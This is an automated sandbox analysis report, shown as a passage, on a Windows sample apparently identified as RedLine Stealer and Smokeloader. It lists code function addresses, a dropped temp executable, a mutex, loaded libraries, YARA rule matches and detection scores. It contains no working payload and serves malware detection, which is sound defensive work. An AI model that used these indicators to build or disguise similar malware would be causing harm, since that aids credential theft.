                  Source: C:\Users\user\Desktop\hpEAJnNwCB.exeCode function: 0_2_024B7FCE0_2_024B7FCE
                  Source: C:\Users\user\Desktop\hpEAJnNwCB.exeCode function: 0_2_024BED470_2_024BED47
                  Source: C:\Users\user\Desktop\hpEAJnNwCB.exeCode function: 0_2_024B7D070_2_024B7D07
                  Source: C:\Users\user\Desktop\hpEAJnNwCB.exeCode function: 0_2_024A8D160_2_024A8D16
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_0040B44C3_2_0040B44C
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_004087903_2_00408790
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_004260543_2_00426054
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_0043B0683_2_0043B068
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_004140703_2_00414070
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_0043C0203_2_0043C020
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_004398303_2_00439830
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_0043D8303_2_0043D830
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_0041B0E13_2_0041B0E1
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_0041F0E03_2_0041F0E0
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_004210E03_2_004210E0
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_004358903_2_00435890
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_004340983_2_00434098
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_0043D0A03_2_0043D0A0
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_004180A93_2_004180A9
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_0040A9403_2_0040A940
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_0041714B3_2_0041714B
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_0040C9173_2_0040C917
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_0042B12C3_2_0042B12C
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_0042F1303_2_0042F130
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_0042B1C03_2_0042B1C0
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_0041D9E03_2_0041D9E0
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_004361E03_2_004361E0
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_004111E53_2_004111E5
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_004059F03_2_004059F0
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_004239F23_2_004239F2
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_0043C1F03_2_0043C1F0
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_0040F9FD3_2_0040F9FD
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_004259903_2_00425990
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_0043B9A13_2_0043B9A1
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_004062503_2_00406250
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_0041D2703_2_0041D270
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_00424A743_2_00424A74
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_004092303_2_00409230
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_00423A343_2_00423A34
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_004192DA3_2_004192DA
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_0043D2F03_2_0043D2F0
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_0043C2803_2_0043C280
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_004152983_2_00415298
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_004082AE3_2_004082AE
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_004252BA3_2_004252BA
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_0041CB053_2_0041CB05
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_00428BC03_2_00428BC0
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_00402BD03_2_00402BD0
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_00428BE93_2_00428BE9
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_004373993_2_00437399
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_004393A03_2_004393A0
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_00416BA53_2_00416BA5
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_004293AA3_2_004293AA
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_004223B83_2_004223B8
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_00436C003_2_00436C00
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_004234103_2_00423410
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_0042B4FC3_2_0042B4FC
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_00404CB03_2_00404CB0
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_004074B03_2_004074B0
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_0041DD503_2_0041DD50
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_004185783_2_00418578
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_0042D57E3_2_0042D57E
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_004245023_2_00424502
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_00421D103_2_00421D10
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_0040DD253_2_0040DD25
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_0041D5E03_2_0041D5E0
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_004175823_2_00417582
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_0043D5803_2_0043D580
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_00427DA23_2_00427DA2
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_004205B03_2_004205B0
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_0042C64A3_2_0042C64A
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_00426E503_2_00426E50
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_0042B4F73_2_0042B4F7
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_004146243_2_00414624
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_0043462A3_2_0043462A
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_004356303_2_00435630
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_004066E03_2_004066E0
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_0042C6E43_2_0042C6E4
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_00430EF03_2_00430EF0
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_004256F93_2_004256F9
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_00422E933_2_00422E93
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_00425E903_2_00425E90
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_004156A03_2_004156A0
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_0041BEA03_2_0041BEA0
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_00438EA03_2_00438EA0
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_00435EA03_2_00435EA0
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_00405EB03_2_00405EB0
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_0041C6BB3_2_0041C6BB
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_00415F663_2_00415F66
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_004197703_2_00419770
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_004097003_2_00409700
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_0042C7263_2_0042C726
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_0042C7353_2_0042C735
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_0041DF803_2_0041DF80
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_00402FA03_2_00402FA0
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_024932073_2_02493207
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_024CB2CF3_2_024CB2CF
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_024C42FF3_2_024C42FF
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_024A734A3_2_024A734A
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_024AB3483_2_024AB348
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_024B13473_2_024B1347
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_024AF3473_2_024AF347
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_024CD3073_2_024CD307
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_024983C73_2_024983C7
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_024BB3933_2_024BB393
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_024BF3973_2_024BF397
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_024A73B23_2_024A73B2
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_024B80093_2_024B8009
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_0249C0E83_2_0249C0E8
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_024C11573_2_024C1157
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_024B81083_2_024B8108
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_024C91073_2_024C9107
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_024C61073_2_024C6107
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_024961173_2_02496117
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_024AE1E73_2_024AE1E7
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_024AC1AC3_2_024AC1AC
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_024C96073_2_024C9607
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_024B96113_2_024B9611
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_024BB7633_2_024BB763
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_024977173_2_02497717
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_024A87DF3_2_024A87DF
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_024CD7E73_2_024CD7E7
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_024BD7E53_2_024BD7E5
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_024A144C3_2_024A144C
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_024C64473_2_024C6447
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_024BB4273_2_024BB427
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_024AD4D73_2_024AD4D7
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_024994973_2_02499497
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_024964B73_2_024964B7
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_024A95413_2_024A9541
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_024CD5573_2_024CD557
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_024AC5283_2_024AC528
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_024945D73_2_024945D7
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_024C5AF73_2_024C5AF7
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_024CDA973_2_024CDA97
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_024C9A973_2_024C9A97
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_0249CB7E3_2_0249CB7E
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_024B5BF73_2_024B5BF7
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_024A7BA73_2_024A7BA7
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_0249ABA73_2_0249ABA7
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_024AD8473_2_024AD847
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_024BB75E3_2_024BB75E
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_024B08173_2_024B0817
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_024C58973_2_024C5897
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_024C48913_2_024C4891
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_024BC8B13_2_024BC8B1
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_024BC94B3_2_024BC94B
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_024969473_2_02496947
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_024999673_2_02499967
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_024AC9213_2_024AC921
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_024A99D73_2_024A99D7
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_024989F73_2_024989F7
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_024BC98D3_2_024BC98D
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_024BC99C3_2_024BC99C
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_024C6E673_2_024C6E67
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_02492E373_2_02492E37
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_024B1F773_2_024B1F77
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_02494F173_2_02494F17
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_024A8F353_2_024A8F35
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_0249DF8C3_2_0249DF8C
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_024ADFB73_2_024ADFB7
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_024ADC473_2_024ADC47
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_02495C573_2_02495C57
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_0249FC643_2_0249FC64
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_024CBC083_2_024CBC08
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_02493C273_2_02493C27
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_024B4CF43_2_024B4CF4
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_024B3C9B3_2_024B3C9B
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: String function: 024981D7 appears 78 times
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: String function: 00414060 appears 74 times
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: String function: 00407F70 appears 46 times
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: String function: 024A42C7 appears 74 times
                  Source: C:\Users\user\Desktop\hpEAJnNwCB.exeCode function: String function: 00410720 appears 53 times
                  Source: C:\Users\user\Desktop\hpEAJnNwCB.exeCode function: String function: 0040F903 appears 36 times
                  Source: C:\Users\user\Desktop\hpEAJnNwCB.exeCode function: String function: 024A0987 appears 53 times
                  Source: C:\Users\user\Desktop\hpEAJnNwCB.exeCode function: String function: 0040FDB2 appears 123 times
                  Source: C:\Users\user\Desktop\hpEAJnNwCB.exeCode function: String function: 024A0019 appears 119 times
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7968 -s 860
                  Source: hpEAJnNwCB.exeStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
                  Source: ScreenUpdateSync[1].exe.0.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
                  Source: 91B1.tmp.exe.0.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
                  Source: hpEAJnNwCB.exeBinary or memory string: OriginalFileName vs hpEAJnNwCB.exe
                  Source: hpEAJnNwCB.exe, 00000000.00000002.3741235829.0000000000400000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFileNameScreenshoter.exeF vs hpEAJnNwCB.exe
                  Source: hpEAJnNwCB.exe, 00000000.00000003.1305902293.0000000002500000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFileNameScreenshoter.exeF vs hpEAJnNwCB.exe
                  Source: hpEAJnNwCB.exe, 00000000.00000002.3745958160.0000000002490000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFileNameScreenshoter.exeF vs hpEAJnNwCB.exe
                  Source: hpEAJnNwCB.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: 00000000.00000002.3745494815.0000000000B09000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                  Source: 00000003.00000002.1759184300.00000000008F8000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                  Source: 00000003.00000002.1759508061.0000000002490000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                  Source: 00000000.00000002.3745958160.0000000002490000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                  Source: hpEAJnNwCB.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: ScreenUpdateSync[1].exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: 91B1.tmp.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: classification engineClassification label: mal100.troj.evad.winEXE@4/7@13/5
                  Source: C:\Users\user\Desktop\hpEAJnNwCB.exeCode function: 0_2_00B0A2CE CreateToolhelp32Snapshot,Module32First,0_2_00B0A2CE
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_004361E0 CoCreateInstance,SysAllocString,CoSetProxyBlanket,SysAllocString,SysAllocString,VariantInit,VariantClear,SysFreeString,SysFreeString,SysFreeString,SysFreeString,3_2_004361E0
                  Source: C:\Users\user\Desktop\hpEAJnNwCB.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q8X2NUFH\track_prt[1].htmJump to behavior
                  Source: C:\Users\user\Desktop\hpEAJnNwCB.exeMutant created: \Sessions\1\BaseNamedObjects\5rjtejk5rytrr
                  Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7968
                  Source: C:\Users\user\Desktop\hpEAJnNwCB.exeFile created: C:\Users\user\AppData\Local\Temp\91B1.tmpJump to behavior
                  Source: hpEAJnNwCB.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: C:\Users\user\Desktop\hpEAJnNwCB.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                  Source: C:\Users\user\Desktop\hpEAJnNwCB.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: hpEAJnNwCB.exeVirustotal: Detection: 40%
                  Source: hpEAJnNwCB.exeReversingLabs: Detection: 44%
                  Source: unknownProcess created: C:\Users\user\Desktop\hpEAJnNwCB.exe "C:\Users\user\Desktop\hpEAJnNwCB.exe"
                  Source: C:\Users\user\Desktop\hpEAJnNwCB.exeProcess created: C:\Users\user\AppData\Local\Temp\91B1.tmp.exe "C:\Users\user\AppData\Local\Temp\91B1.tmp.exe"
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7968 -s 860
                  Source: C:\Users\user\Desktop\hpEAJnNwCB.exeProcess created: C:\Users\user\AppData\Local\Temp\91B1.tmp.exe "C:\Users\user\AppData\Local\Temp\91B1.tmp.exe" Jump to behavior
                  Source: C:\Users\user\Desktop\hpEAJnNwCB.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\Desktop\hpEAJnNwCB.exeSection loaded: msimg32.dllJump to behavior
                  Source: C:\Users\user\Desktop\hpEAJnNwCB.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Users\user\Desktop\hpEAJnNwCB.exeSection loaded: msvcr100.dllJump to behavior
                  Source: C:\Users\user\Desktop\hpEAJnNwCB.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Users\user\Desktop\hpEAJnNwCB.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\Desktop\hpEAJnNwCB.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\Desktop\hpEAJnNwCB.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\Desktop\hpEAJnNwCB.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\hpEAJnNwCB.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\hpEAJnNwCB.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\Desktop\hpEAJnNwCB.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Users\user\Desktop\hpEAJnNwCB.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Users\user\Desktop\hpEAJnNwCB.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\hpEAJnNwCB.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\hpEAJnNwCB.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Users\user\Desktop\hpEAJnNwCB.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Users\user\Desktop\hpEAJnNwCB.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Users\user\Desktop\hpEAJnNwCB.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\hpEAJnNwCB.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Users\user\Desktop\hpEAJnNwCB.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Users\user\Desktop\hpEAJnNwCB.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Users\user\Desktop\hpEAJnNwCB.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Users\user\Desktop\hpEAJnNwCB.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\hpEAJnNwCB.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\hpEAJnNwCB.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\hpEAJnNwCB.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\Desktop\hpEAJnNwCB.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\Desktop\hpEAJnNwCB.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\Desktop\hpEAJnNwCB.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\hpEAJnNwCB.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Users\user\Desktop\hpEAJnNwCB.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Users\user\Desktop\hpEAJnNwCB.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\Desktop\hpEAJnNwCB.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Users\user\Desktop\hpEAJnNwCB.exeSection loaded: windows.staterepositoryps.dllJump to behavior
